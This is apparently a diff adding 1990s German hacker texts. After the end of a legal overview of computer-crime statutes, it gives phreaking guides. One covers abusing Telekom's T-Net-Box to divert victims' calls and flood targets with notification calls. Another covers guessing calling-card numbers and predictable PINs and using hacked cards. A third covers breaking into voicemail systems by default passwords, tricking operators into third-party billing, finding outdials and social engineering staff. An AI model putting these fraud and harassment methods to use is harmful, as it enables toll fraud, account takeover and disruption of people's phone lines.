+Das "Gesetz gegen den unlauteren Wettbewerb" bedroht in diesem Paragraphen
+denjenigen/diejenige mit Strafe, der/die in einem Betrieb beschaeftigt ist/sind
+und ihm anvertraute oder zugaenglich gewordene Betriebsgeheimnisse unbefugt
+jemanden mitteilt, und zwar zu Zweckendes Wettbewerbs, aus Eigennutz, zugunsten
+eines Dritten oder um den Betriebsinhaber zu schaden.
+Im 17 Abs. 2 Nr.1 wird desweiteren das unbefugte Sichverschaffen oder Sichern
+von Geschaefts- oder Betriebsgeheimnissen zu den oben genannten Zwecken mit
+Strafe bedroht, sofern das durch "Anwendung technischer Mittel, Herstellung
+einer Verkoerperten Wiedergabe des Geheimnisses oder Wegnahme einer Sache, in
+der das Geheimnis verkoerpert ist", geschieht.
+17 Abs. 2 Nr.2 schliesslich verbietet die unbefugte Verwertung oder Weitergabe
+von Geheimnissen, die auf die genannten Weisen in Erfahrung gebracht wurden.
+Als Wirtschaftsgeheimnis wird jede nicht offenkundige Tatsache betrachtet, an
+der ein objektives Geheimhaltungsinteresse besteht (gemeint ist ein rationales
+Eigeninteresse).
+Eine Verwertung im Ausland wird als "besonders schwerer Fall" mit Freiheits-
+strafe bis zu 5 Jahren Haft oder Geldstrafe bedroht.
+Obwohl der Wortlaut von "Angestellten, Arbeitern oder Lehrlingen" spricht,
+wird 17 Abs.1 UWG auf jeden irgendwie in einem Betrieb BeschaeftigteN
+angewendet.
+
+2.2.2 Unerlaubte Verwertung urheberrechtlich geschuetzter Werke
+      (106, 108, 108a UrhG)
+
+Das Gesetz ueber Urheberrecht und verwandte Schutzrechte verbietet in dieser
+Vorschrift die Vervielfaeltigung, Verbreitung oder oeffentliche Wiedergabe eines
+Werkes oder einer Bearbeitung oder Umgestaltung eines Werkes.
+Ausnahmen sind die "gesetzlich zugelassenen Faelle" (z.B. private Sicherheits-
+kopien - keine Raubkopien!) und die Einwilligung des Berechtigten.
+Als "Werk" - im weitesten Sinne als "Sprachwerk" - gelten auch
+Computerprogramme. Sie muessen allerdings "die Leistung eines Durchschnitts-
+programmierers deutlich uebertreffen".
+Was ist denn ein "Durchschnittsprogrammierer"? Richtig, was denn der/die
+RichterIn gerade meint, und der/die mag wahrscheinlich keine Software-Piraten.
+Aus technischen Gruenden findet dieser Paragraph z.T. schon auf blosse
+unbefugte Nutzung Anwendung. Im uebrigen kriminalisiert der 1995 wieder
+aktualisierte 108 UrhG denselben Umgang bzw. die Verwertung auch noch in Bezug
+auf wissenschaftliche Ausgaben, Lichtbilder und Tontraeger.
+Im Fall Gewerbsmaessiger unerlaubter Verwertung im Sinne der 106 bis 108 UrhG,
+setzt 108a UrhG den hoeheren Strafrahmen von bis zu 5 Jahren Freiheitsstrafe
+oder Geldstrafe fest.
+"Gewerbsmaessig" ist jede Nutzung der unerlaubten Verwertung als fortdauernde
+Einnahmequelle.
+Im Umkehrschluss folgt daraus u.a. auch, dass im 106 bis 108 entgegen
+anderslautenden Geruechten nicht notwendig ein kommerzielles Interesse
+voraussetzen.
+
+
+
+3. Tabellenuebersicht ueber die behandelten Paragraphen
+
+
+Tatbestand                  ³Paragraph³  Strafdrohung   ³  Verfolgung  ³Versuch
+ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄ
+Ausspaehen von Daten        ³202a StGB³bis zu 3 Jahren  ³Offizialdelikt³  ---
+                            ³         ³oder Geldstrafe  ³              ³
+ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄ
+Computerbetrug              ³263a StGB³bis zu 5 Jahren  ³Offizialdelikt³strafbar
+                            ³         ³oder Geldstrafe  ³              ³
+ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄ
+Erschleichen von Leistungen ³265a StGB³bis zu 1 Jahren  ³Offizialdelikt³strafbar
+                            ³         ³oder Geldstrafe  ³              ³
+ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄ
+Faelschung beweiserheblicher³269  StGB³bis zu 5 Jahren  ³Offizialdelikt³strafbar
+Daten / tech. Aufzeichnungen³270  StGB³oder Geldstrafe  ³              ³
+ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄ
+Datenveraenderung           ³303a StGB³bis zu 2 Jahren  ³  auf Antrag  ³strafbar
+                            ³         ³oder Geldstrafe  ³              ³
+ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄ
+Computersabotage            ³303b StGB³bis zu 5 Jahren  ³  auf Antrag  ³strafbar
+                            ³         ³oder Geldstrafe  ³              ³
+ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄ
+Verrat von Betriebsge-      ³ 17  UWG ³bis zu 3 Jahren  ³ in der Regel ³strafbar
+heimnissen                  ³         ³oder Geldstrafe  ³  auf Antrag  ³
+ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄ
+Unerlaubte Verwertung       ³106  UrhG³bis zu 3 Jahren  ³ in der Regel ³strafbar
+urheberrechtl. gesch. Werke ³108  UrhG³oder Geldstrafe  ³  auf Antrag  ³
+ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄ
+

Papers/t-box.txt

@@ -0,0 +1,230 @@
+
+                   TTTTTT     BBB       OO      X    X
+                     TT       B  B     O  O      X  X
+                     TT  ---  B B     O    O      XX
+                     TT       B  B     O  O      X  X
+                     TT       BBB       OO      X    X
+      _________________________________________________________________
+
+
+
+Heute wollen wir alle mehr ueber die ganz neue Erfindung der Telekom - der
+T-Box (eigentlich T-Net-Box), dem Anrufbeantworter im digitalen Netz, erfahren!
+Viel Spass mit diesem Textchen wuenscht euch euer Hitronic...
+Aber immer dran denken: Die Missbraeuchliche Nutzung der T-Box, wie sie in
+dieser Textdatei nur zu LEHRZWECKEN beschrieben wird, ist illegal.
+
+
+                        ***Was ist die T-Box?***
+                        ------------------------
+
+Die T-Box stellt eine neue Dienstleistung im digitalen Netz der Deutschen
+Telekom dar, d.h., dass mit der T-Box der klassische Anrufbeantworter in der
+urspruenglichen Form, also z.B. als kleines Maschinchen neben dem Telefon,
+ueberfluessig wird. 
+Auf Wunsch kann die T-Box gegen ein Entgeld von DM 4 pro Monat (in der
+Grundstufe) aktiviert werden, und sofort den Dienst als virtueller
+Anrufbeantworter aufnehmen. Warum "virtuell"? - Ganz einfach: Ihr bekommt fuer
+die DM 4 im Monat keinen Anrufbeantworter zum "anfassen", jedoch von der
+Telekom einen Service, der es ermoeglicht, Anrufe direkt im digitalen Netz
+entgegenzunehmen. Im Klartext sieht das dann so aus, dass, je nach gew„hlter
+Einstellung, alle Anrufe (oder Anrufe, die laenger als dreimal "Klingeln"
+abwarten mussten) auf ein netzinternes VMB-System umgeleitet und dort wie von
+einem Anrufbeantworter entgegengenommen werden. Natuerlich koennt Ihr
+problemlos einen eigenen Ansagetext aufnehmen, der dem Anrufer beim erreichen
+Eurer T-Box vorgespielt wird.
+
+
+
+             ***Warum T-Box und kein klassischer AB?***
+             ------------------------------------------
+
+Die T-Box weist im Vergleich zum Hardware-AB aufm Schreibtisch einige Vorteile
+auf:
+     - Die Anschaffungskosten fuer einen neuen AB werden gespart
+     - Die T-Box kann mehrere Anrufe gleichzeitig bearbeiten
+Die T-Box ist ausserdem mit dollen Funktionen ausgestattet, die nicht jeder
+billig-AB vorweisen kann, z.B.:
+     - Benachrichtigungsfunktion an jedem beliebigen Telefonanschluss der Welt
+       bei Neueintreffen von Nachrichten
+     - hohe Speicherkapazit„t (auf Wunsch viele, lange Nachrichten)
+     - in der Aufbaustufe (gibts spaeter mal) auch Sonderfunktionen, wie z.B.
+       Faxempfang oder Erhoehung der Speicherkapazitaet durch Mehrpreis etc.
+
+
+
+        ***Warum beschaeftigen wir uns hier mit der T-Box?***
+        -----------------------------------------------------
+
+Ja, natuerlich nicht, weil wir alle unsre tollen Ab's wegwerfen und der
+Telekom schoen viel Geld zuschustern wollen, sondern weil man z.Zt. mit der
+T-Box relativ viel Unsinn anrichten kann, woll'n wir hoffen, dass das so
+bleibt, aber mehr dazu spaeter...
+
+
+
+      ***So, hier einige konkrete Informationen zur T-Box:***
+      -------------------------------------------------------
+
+Die T-Net-Box kann an jedem digitalen Telefonanschluss (auch ISDN) manuell vom
+Anschlussinhaber freigeschaltet werden, indem die gebuehrenfreie Rufnummer
+0130-144770 gewaehlt wird und nach der Ansage die "#"-Taste gedrueckt wird
+Nach diesen beiden Schritten (1. Anwahl, 2. '#'-druecken) ist die T-Box also
+freigeschaltet und nach Wahl der "persoenlichen Identifikationsnummer"
+betriebsfaehig! Um jetzt als Besitzer die Box, also den Anrufbeantworter,
+einrichten zu koennen, um z.B. Begruessungen aufzunehmen, die
+Benachrichtigungsfunktionen einzustellen oder nachher auch die neuen
+Nachrichten abzuhoehren, muss von dem Anschluss, von dem aus die Box aktiviert
+wurde, wieder die Rufnummer 0130-144770 gewaehlt werden. Nun hoert ihr hoechst
+wahrscheinlich die Ansage "Willkommen in der T-Net Box von [eure Rufnummer]
+usw.". Jetzt koennt ihr durch druecken von "*" und durch Eingabe eurer PIN
+waerend der Ansage ins Hauptmenue der T-Box gelangen. Da das System genau wie
+ein Voicemailsystem aufgebaut ist und sich durch eine freundliche Frauenstimme
+von selbst erklaert, will ich an dieser Stelle nicht auf die genauen Funktionen
+eingehen, die gesamte Menuestruktur folgt spaeter.
+
+                         Aktivierung:
+                         ------------
+Wenn die T-Net-Box von einem normalen digitalen Anschluss eingerichtet wurde,
+kann sie wie folgst aktiviert werden: Hoerer abheben und druecken von:
+
+           "*000#" fuer "Alle Anrufe zur T-Net Box"
+           "*555#" fuer "Anrufe im Besetztfall zur Box"
+           "*888#" fuer "Anrufe nach drei Klingelzeichen zur Box"
+
+zum deaktivieren entsprechend: "#000#", "#555#" und "#888#".
+Bei ISDN-Anschluessen muss zur Aktivierung der Box die AWS
+(Anrufweiterschaltung) auf die Nummer 0130-144770 eingeschaltet werden,
+teilweise muss erst ein Komfortanschluss beantragt werden, damit die AWS
+verfuegbar ist.
+
+
+
+           ***Hier nochmal die wichtigsten Infos im Ueberblick:***
+           -------------------------------------------------------
+
+ - Freischalten der Box von jedem digitalen Telefonanschluss durch Anwahl von
+   0130-144770
+ - Aktivieren der Box durch "*888#" fuer "Umleitung auf Box bei Nichtmelden",
+   "*555#" fuer "Umleitung auf Box bei besetzt" oder "*000#" fuer "Umleitung
+   aller Anrufe auf die Box".
+ - Fernabfragen der Box durch Anwahl der eigenen Rufnummer, Druecken von "*"
+   und Eingabe der PIN (nun landet man im Hauptmenue und kann sich bequem von der Stimme fuehren lassen)
+ - Hilfe und Informationen zur T-Box sind, vorerst fuer Telekommitarbeiter,
+   unter der Rufnummer 0130-141414 vom unfreundlichen Operator erfragbar (Ihr
+   solltet, wenn gezielt gefragt wird, nicht leugnen, dass Ihr bei der Telekom
+   arbeitet)
+
+
+
+                        Die Menuestruktur
+                        -----------------
+
+        Anwahl von 0130144770 oder der eigenem Rufnummer
+                              \  /
+                               \/
+                         Eingabe der Pin 
+                              \  /
+                               \/
+                           Hauptmenue            
+                         /           \
+                        /             \
+Einagabe von "1" zum Hoeren            Eingabe von "3" zum Aendern 
+     der Nachrichten                         der Einstellungen
+            /                                      \
+           /                                        \
+Waehrend des Abhoerens:                   - 1. Ansagetexte
+1. Zurueckspulen                            1.1 Namen aendern
+2. Pause/Weiter                             1.3 Begruessungstxt
+3. Vorspulen/Uebersprigen                   1.4 Ansagetext
+7. Wiederholen                            - 2. Grundeinstellungen
+8. Speichern                                2.1 Betriebsart
+9. Loeschen                                     waehlen: AB oder
+0. Zurueck                                      nur Ansagetext
+                                            2.6 Statusabfrage
+                                            2.9 Loeschen der Box
+                                          - 3. Benachrichtigungen
+                                            3.1 Benachrichtigung
+                                                am eigenen Phone
+                                            3.2 Infofix (gibts                                  
+                                                noch ganich)
+                                            3.3 Auf Pagern
+                                            3.4 Auf Beliebigen
+                                                Anschluessen
+                                          - 4. Aendern der PIN
+                                          - 5. Hilfetext
+                                          - #5 Operatorruf (free!)
+                                          - 0 Ins Hauptmenue
+
+
+
+
+
+
+                     Technische Informationen:
+                     -------------------------
+
+ - In der Grundstufe fasst die Box 30 Nachrichten zu je 2 Minuten
+ - In der spaeter folgenden (gegen Jahresende) Aufbaustufe wird die Box gegen
+   Aufpreis eine hoehere Aufzeichnungskapazitaet und z.B. Funktionen wie
+   Faxempfang unterstuetzen
+ - Z.Zt befindet sich der ganze T-Net-Box-Rechner in Duesseldorf, zum
+   offiziellen Marktstart soll aber die notwendige Hardware jeweils in der
+   eigenen Vermittlungsstelle vorhanden sein
+
+
+
+
+
+                       ***T-Box zum Missbrauchen***
+                       ----------------------------
+
+Nun das wichtigste: Wie kann ich mit meiner T-Box der Deutschen Telekom
+schaden? [Lechz :-9] Na SO:
+Ja, jetzt haben wir hoffentlich verstanden, wie einfach und schnell man die
+eigene T-Box selber freischalten kann, das muss man der Telekom wirklich
+lassen, das isst ja ein ganz unkomplizierter Vorgang. Naja, aber waere doch mal
+interessant zu erfahren, was passiert, wenn man auf FREMDEN Anschluessen
+T-Boxen freischaltet... Muessen die Anschlussinhaber dann nicht DM 4 im Monat
+zahlen? Oder noch besser: Was ist, wenn die Anschluesse der Telekom gehoeren,
+da sie sich in TELEFONZELLEN befinden? Ja, sehr interessant...
+In der Tat sieht es so aus: Digital vermittelte Telefonzellen bieten (zur Zeit)
+prinzipiell die Moeglichkeit, T-Boxen auf sich selber freizuschalten. 
+Theoretisch muessten dann auch die DM 4 pro Monat auf deren Kosten "abgebucht"
+werden, was natuerlich nicht moeglich ist. Im Moment (Mai 1997) werden jedoch
+sowieso noch keine Gebuehren fuer die Box erhoben, aber spaetestens ab dem
+offiziellen Marktstart wird wohl auch das der Fall werden. Im Zusammenhang mit
+Telefonzellen oder fremden Anschluessen bietet die T-Box grundsaetzlich fuenf
+(Ab-)Nutzungsmoeglichkeiten:
+
+1.) Nach der Freischaltung einer T-Net-Box wird zunaechst default-maessig eine
+Standardansage benutzt, die die RUFNUMMER des ANSCHLUSSES beinhaltet.
+Prinzipiell ist das die EINZIGE Moeglichkeit fuer den normal-T-Net-Benutzer,
+die Rufnummer eines Anschlusses herauszubekommen, die keine (ISDN)-Kennung
+uebertraegt. Also koennt Ihr in Zukunft auch in Telefonzellen (oder im
+Hotelzimmer) zurueckgerufen werden, selbst wenn dort die Rufnummer des
+Anschlusses NICHT bekanntgegeben wird, oder findet sie einfach selber heraus!
+
+2.) Die bloedste Nutzungsmoeglichkeit: Wenn ihr bei einem "Freund" oder
+Bekannten zu Besuch seid, koennt ihr durch wenige Handgriffe seine
+Telefonrechnung um DM 4 im Monat ansteigen lassen, oder seinen Anschluss sogar
+ganz von der Aussenwelt abkapseln: Aktiviert bei jemandem die T-Net-Box, und
+schalten "*000#" ein, somit werden alle Anrufer auf seine Box umgeleitet,
+wovon das Opfer ja nicht weiss. (Bei der Aktivierung der "*000#"-Funktion ist
+fuer den Anschlussinhaber nur ein Sonderwahlton zu hoeren, er merkt also, dass
+irgendetwas mit seiner Line nicht in Ordning ist...
+
+3.) Eine andere Methode, die Box zu missbrauchen, ist, einfach in der
+Benachrichtigungsfunktion die Nummer eines geliebten Todfeindes einzusetzen,
+und sobald wir in der Box durch Anwahl der 0130-144770 eine Nachricht, oder
+auch zwei oder auch 2 Millionen hinterlassen, klingelt bei ihm das Telefon
+sturm (Und zwar wird die Zielperson dann direkt von der Deutschen Telekom
+terrorisiert, hehe). Oder man gibt in der Benachrichtigungsfunktion einfach die
+Nummer eines beliebten Boards an, und kann so, vollkommen kostenfrei, fuer
+staendige Nichterreichbarkeit sorgen, das bringt Freude! (und Feinde...)
+
+
+
+
+To contact the author, write e-mail to HITRONIC@USA.NET
+

Papers/tcards.txt

@@ -0,0 +1,99 @@
+
+T-CARD, GERMAN TELEKOM'S CALLING CARD
+
+by GemFire/THC
+
+I think, it was a year ago, when I first heard about a new calling card,
+this time by German Telekom. The history of calling card fraud is very long,
+because AT&T, MCi, Sprint and other phone companies made it possible for many
+hackers and phreakers all over the world to make free phone calls very easy.
+Now German Telekom offers the same service?! I think many guys tried to hack
+those new cards, but I've never heard of a big success. There are several
+different types of T-Cards, one is called T-CARD25 which is a pre-paid card
+with an amount of 25 DM (18 $) - the other one is a charge card.
+The cardholder will get a bill every month. On this bill all called phone
+numbers are listed, but with XXX instead of the last three digits.
+There are three possibilities to pay for your card: Together with your normal
+phone bill, with a credit card or you give the permission, that Telekom will
+take it from your bank account. In my new school, we must work in a local
+company for a few weeks, to get the feeling of the real live. I looked up the
+list and found out, that I must work for German Telekom. With an evil grin
+I went home... There were a lot of things to do at Telekom, one fine thing
+was, that I was able to make free calls, without having problems. There's
+a big room there filled with ISDN phones from where you can make private calls.
+One day, I called the Telekom Business Service and asked some questions.
+The operator there noticed my Telekom internal Caller ID and she started 
+talking with me about many things. I got the answers to some difficult
+questions, and she gave me an internal number for detailed technical
+informations. "Don't give out this number to customers!" she warned me and
+again I left the room with an evil grin on my face. One other day, an old
+guy asked if there's is somebody who knows about T-Cards. He quickly noticed
+that I'm more intelligent than the average Telko pig and an hour later I found
+myself in a small room with a phone and a list full of Telekom internal calling
+card numbers. I became an official T-Card System Tester. We tried a lot of
+things and in one test, Telekom wanted to find out how many callers can call
+the computer at the same time, before it will shut down. I made calls to the
+whole world, and more and more testers all over the country invaded the system.
+The automated voice talked slower, simple options took over one minute to
+complete. Again, I made some calls and checked the account information.
+I noticed that the last calls weren't billed. Interesting...
+The internal cards were interesting, too. They acted like charge cards, but
+they had a 50 DM (36 $) limit per month. The card computer itself is very
+intelligent, it is able to learn the habits of a customer, e.g. which countries
+he calls normally and how long he's talking. A further security measure is,
+that after three wrong pin entries, the card will be locked for further calls
+until the owner of the card calls the operator. Every customer can choose
+a password/passphrase for such actions, because the operator must be sure
+that the caller is really the cardholder. Sometimes they even make a callback
+verification. You can use T-Cards in over 50 countries. I just tell you the
+numbers of the most important countries.
+
+           Germany                 0130-0222
+           Australia (Telstra)     1800-881-490
+           Australia (Optus)       008-5511-49
+           France                  19-(wait for second dialtone)-0049
+           Great Britain (BT)      0-800-89-0049
+           Great Britain (Mercury) 0-500-89-0049
+           Hawaii                  1-800-865-0049
+           Hongkong                800-0049
+           Irland                  1-800-55-0049
+           Israel                  177-490-2727
+           Italia                  172-0049
+           Japan (KDD)             0039-491
+           Japan (IDC)             0066-55-449
+           Canada                  1-800-465-0049
+           Netherlands             06-022-0049
+           Austria                 022-903-049
+           Sweden                  020-799-049
+           Spain                   900-99-0049
+           South Africa            0800-99-0049
+           USA (AT&T)              1-800-292-0049
+           USA (MCi)               1-800-766-0049
+           USA (US-Sprint)         1-800-927-0049
+
+How to use a hacked card?
+
+1. Dial the access number
+2. Press 1 for T-Card Service (if you're not calling from Germany)
+3. Choose language: Press 1 for German, 2 for English and 3 for French
+4. Enter Cardnumber and PIN then press #
+5. Enter the number you wish to call dial 00+country code+number and press #
+   Instead of dialing a number you can access a submenu with *1#
+   Listen to the voice what you can do there.
+
+Charge cards have the following format 8XXX XXXX XXXX + PIN (4 digits)
+Pre-paid card have no PIN number, which makes them easy to hack, as if you
+know a valid pre-paid card number you can easily guess new numbers.
+They're not in sequence, but if 8214 1234 1234 is a valid card you can guess
+some valid cards easy. But 18 $ is not very much, so concentrate hacking
+the real ones. They came in two envelopes and the second letter arrives
+about one or two days later. One letter contains the card, and the other the
+PIN number. This should make stealing difficult, but wait... My card arrived
+in July 95 and the temporary pin was 9507. Got the point?
+I know it's difficult to hack one of these card, but if you have one, you'll
+have much phun. I'm abusing one of the test cards for 6 month now. Customer
+cards will often work a whole month. I think that's worth it.
+
+Have phun!
+
+GemFire/THC

Papers/vmb.txt

@@ -0,0 +1,326 @@
+0. First Words
+--------------
+
+Hi!
+This will be an article on what you can do with VMB's.
+I was not sure if I really could add anything new to this topic, but I think
+I can give you a complete list of "What they can do for you" and also I pro-
+mised this artcle to van Hauser so here it is.
+Don't blame me if you already know anything, again, it is WHY someone should
+concern about VMB's.
+There are quiete a lot of text files on VMB Systems and I will give
+you an overview of files which deal with the hacking of special systems at
+the end of this article.
+
+1. Overview of what-do-to with VMB's
+------------------------------------
+-use them as (simply) Voice-Mail
+-use them as 3rd party call possibility
+-use them to call for free
+-use them to make conferences
+-use them to find switching systems
+
+2. Voice Mail
+-------------
+The originating thing why VMB's got invented. Suppose you have a company and
+50 guys working there. Let's say you got 20 calls after hours on your
+answering machine and each one is for a different guy. So why not having a
+system where anybody can leave a message to the specific guy he wants?
+So each guy has his own mailbox where he gets his calls if he is away from
+his desk or not at home. If you connect to a voicemail, you will always get
+a prompt where normally you can leave a message to the company or if you know
+the extension of the guy you want to talk to to him directly.
+So within your own VMB, you can hear messages from outside callers or from
+someone within your company. That's the basis.
+If you want to hack a VMB, you always have to find where the 3 or 4 (the
+only system with 2 digit extensions I know is Partnell Mail from AT&T?)
+digit extension are, they are mostly grouped. You always have 2 possibilities,
+you can transfer to extensions and see if they do exist (meaning you hear
+some greetings) or enter a mailbox and see if it prompts with password.
+There are different systems but I suggest you always transfer to extensions
+because you can find interesting things (see later on). If you have a clue
+where the most extensions are, you can start hacking one box with trying
+passwords like 1234 or the boxnumber. I would never concern on more passwords
+because if no easy password fits, than the system is often better protected,
+and there are enough silly systems with stupid administrators you can hack.
+If you have hacked a box belonging to someone else, you should NEVER hear
+any mails, you just find free boxes belonging to noone by using the
+distribution list command or the message received command which exists on
+all systems. Normally you notice a free box (either when transfering to a
+box from outside or when using the commands from inside) when there is no
+greeting and just a message like 'extension 123' or 'record at the tone'.
+A very good way to locate boxes is to use the name-search which exists on
+almost any systems. Hear the company's greeting and they often tell some-
+thing like "press 9 to use the directory". Enter the beginnings of common
+names and you will get the person's extension number.
+So well, why should you hack a VMB and have a extension? Simply because
+it's quiete cool & useful to keep in contact with other hacker's.
+If you hack more extensions on one system, they invite your friends and
+have a big communication tool - tollfree! (Ah btw, NEVER ever hack voice-
+mail systems in your own country, because of the bust & trace possibility,
+but if you hack american systems on toll-free numbers [of course reachable
+from within your own country], you cannot be busted. At least not in Germany)
+The THC posse uses an Aspen system for more than 6 month with more than
+20 extensions I hacked in September '95. Really, it is a big helpful tool to
+keep in touch with each other for free, and we do not only talk about hacking
+stuff, it is quiete funny to leave messages to the other's if you are drunken
+at a party or whatever!
+The most comfortable system in my eye's is Aspen from Octel ("Voice Infor-
+mation processing") which exits in different dimensions and cost up to
+$600.000. It has become -sad but true- hard to hack because most systems
+have no defaults anymore. The Aspen systems can be integrated into several
+switches and often has the bridge capacibility. (see later)
+
+3. 3rd party calling
+--------------------
+I guess you know what this is. If not, you can pay calls over certain
+companies (e.g. MCI) which accept that a 3rd party pays all costs.
+You tell the operator to place a 3rd party call and he calls the number you
+give him to verify he will accept the charges. Because operators are dumb
+(well why they are just operators) and because of the good line quality,
+you can trick them with a VMB which has a greeting like "hallo? ah .... hmm
+(pause) ... yes ... I accept the charges".
+Well you ask, how can an american operator dial a toll-free number in Germany
+and enter an extension or what? In fact, many VMB systems have a direct dial
+(Especially Meridian's) and if it is an american company, of course in the
+states. (and this number can be dialed from the operator)
+Direct dial means that your extension is not only reachable over the main
+number (where you can enter the person's extension), it is reachable over
+a normal telephone number. Let's say the company originates in AC 718, and
+the company wants their guys (of course) to be called by customers. So they
+have a whole prefix which belongs to the company, The last four digits are
+for the guys in the company. If this company owns a VMB, the extensions of
+the guys normally are the last four digits of the phonenumber. So if you
+hacked extension 3000, and the company is located in 718-123-xxxx, your
+direct dial would be 718-123-3000. So go and ask the operator (by paging
+or within business hours) for their main number in the states, and they
+will tell you the things you need (AC, prefix). If they give you an 1-800
+number ask them for their fax number or whatever, to get the missing digits.
+If anything fails go and ask them for their direct dial.
+So know you can change your greeting to the one above and tell the operator
+to bill the call to 718-123-3000.
+Again, many companies already got abused and have restricted their whole
+prefix for accepting 3rd party calls, but it is always worth a try and MCI
+has good overseas lines from Germany.
+
+4. Make free calls
+------------------
+Remember the things of a direct dial. Think of the use of a PBX and
+what a PBX does. Bingo, of course if the company has PBX and has a direct
+dial, you can reach their dialtone toll-free. So if you are scanning a VMB
+(by transfering to the extensions) you may run over a dialtone which VERY
+often has no code on it. I think the systems which have the possibility of
+being a part of the PBX are limmited. Audix (by AT&T) and Meridian (by
+Northern Telecom) are worth a try and I have run over severals dialtones
+on these systems. I guess Aspen has the possibility too, but I never found
+anything. If you have a girlfriend which speaks a good english, you can try
+to social-engineer the extension where the dialtone is located. (Use a name
+which is really in the company you got from the names directory, say you
+are struck in Europe and forgot all your paper's with the extension. Better,
+[because not too many companies have agents which travel to Europe] you let
+your call look like it originates from the US by using the 3rd party call
+way or so. Or if you have hacked a box, page the operator from within the box,
+because he cant see where your call is originating from!)
+Anyway if you are struck by scanning the system but you do think it really
+must have a dialtone (probably because the company is so big and has direct
+dial), go and do social-engineering, especially after hours, because these
+operator are unsophisticated and often have no idea of fraud. At business
+time, they could connect you to security (oops) or they even are the security
+operator (ooooops).
+There is also a way to call for free if the VMB system has the ability to for-
+ward calls. If you want that all calls after hours are forwarded to your home
+phone, you enter configure this within your box. Many bigger systems like
+Audix do have the capacibility, but it is disabled very often. Smaller
+systems like Cindy or The Message Desk have this feature not disabled and you
+can use it to divert your calls by entering the phone number you want within
+your hacked box and then transfer to your own hacked extension which will
+forward the call to your favourite BBS.
+As small bonus, I include a special section on The Message Desk systems,
+because I haven't found any text file about it and because Germans can abuse
+Message Desk Systems in UK very easy! A big Thanks & GOOD LUCK! to Krew-l-t
+who introduced me to this neat system.
+Well basically when you dial press # and then enter a box number...most
+are unpassworded...to find extensions dial in and press * then dial
+3 digits or 4 (there is also boxes 1,2 and 3). If you hear no special
+greeting then enter this box number and if it has no password, you have your
+own box. You can also use boxes belonging to someone IF he hasnot activated
+call-forwarding; he would be quiete anxious if he is awaiting calls at his
+home and all guys will get connected to LORE BBS :). So always change the
+number back after you used it. Once in a box do 7 then 7 again...then 2, then 9+ the number you wannt to reach then #, then # again,
+then * twice, then the box number you wannt to divert to.
+There is a special possibility to dial out on Meridian voicemail system. There
+are certain extensions you can transfer to and hear nothing. You may have
+found the outdial code. Try to transfer to this extension and add a number.
+Let's say at extension 1234 you hear nothing. If you dial 1234+00-cc-number
+you may be connected to your desired target. Especially systems in the UK
+often have this outdial possibility, and since you have unlimmited tries for
+scanning extensions, you can find them quiete easily. Of course, any Meridian
+in any country has this possibility, but it must not be set up on the system.
+Something you may also try is to key in certain digits at the main prompt
+(the one with the company's greeting) and I sometimes got a dialtone just by
+pressing 9 at this prompt.
+
+5. Conferences
+--------------
+Probably you have visited the DefCon Voice bridge in the USA. You can find
+something like this on Meridian, Aspen and Audix Systems. Basicly, it is the
+same thing as with the outdial code. You enter extensions and if you hear
+nothing, but it is not an outdial, it may be a conference setup. The Analyst
+for example found a conferences for 8 people on a Meridian in Germany.
+Let's say there was 2000 and then silence, but 2000+00-cc-number didnot work.
+So he tried something and when entering 200008 a voice said "Conference set
+up for 8 persons." They could connect to the conference when dialing 2000X1.
+If you ever want to be a part of our great conferences we hold from time to
+time just contact me or any of the THC crew.
+On Audix systems, you hear a special bridge-tone when you have found a
+conference extension. Check up if someone may transfer to this extension
+at the same time and you can speak to each other now, or try extensions near
+the bride extensions, or something like this.
+But be careful, you might stumble into existing conferences sometimes!
+(But it may be quiete funny to be a part of them!)
+
+6. Switching Systems
+--------------------
+In my opinion, this is the interesting part now, becuase it can give you a
+lot of power if you have managed it to hack a switching system through a
+voice mail system.
